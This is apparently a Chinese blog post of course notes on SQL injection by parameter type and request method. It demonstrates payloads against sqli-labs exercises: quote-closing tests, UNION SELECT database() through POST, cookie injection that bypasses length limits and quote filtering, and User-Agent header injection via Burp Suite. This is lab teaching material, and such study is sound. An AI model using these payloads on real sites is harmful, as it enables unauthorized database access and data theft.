<小迪安全>14-SQL注入之类型及提交注入

文章介绍了SQL注入的基本概念,包括参数类型如数字、字符和JSON,以及常见的请求方法如GET和POST。通过演示实例展示了如何利用BurpSuite进行SQL注入攻击,如使用单引号、双引号闭合技巧,以及通过cookies和HTTP_USER_AGENT字段绕过防护策略。同时,提到了服务器对浏览器信息的接受及安全防护措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

1.知识点

 2.演示实例


1.知识点

#简要明确参数类型

数字,字符,搜索,JSON等

数字可以直接加在sql中

字符就要通过单双引号接入sql语句中<闭合字符串>

#简要明确请求方法

GET, POST, COOKIE, REQUEST, HTTP头等

(request全部接受)

其中SQI语句干扰符号: ', ", %, ), } 等,具体需看写法 '"]})可以作为默认测试写法

JSON数据形式

curl -X POST https://api.zoomeye.org/user/login -d
{
"username": "foo@bar.com",
"password": "foobar"
}

 2.演示实例

#考虑单引号,双引号闭合问题--sqli5,6

?id=1 and1=1--不显示

?id=1' and '1'='1

?id=1' and '1'='2--报错

# 用post提交数据--sqli11

burpsuite抓包--也可在burp改包

uname=admin' and 1=2 union select 1,2#&password=admin&submit=Submit

uname=admin' and 1=2 union select database(),2#&password=admin&submit=Submit

#cookie--sqli20

通过源代码发现,对于提交内容,有长度限制和魔术引号过滤,这时候可以考虑cookie注入,绕过防护

Cookie:uname=admin' and 1=1 union select database(),2,3#--爆库

#server

HTTP_USE_AGENT:接受浏览器信息

在burp的User-Agent改包即可注入成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值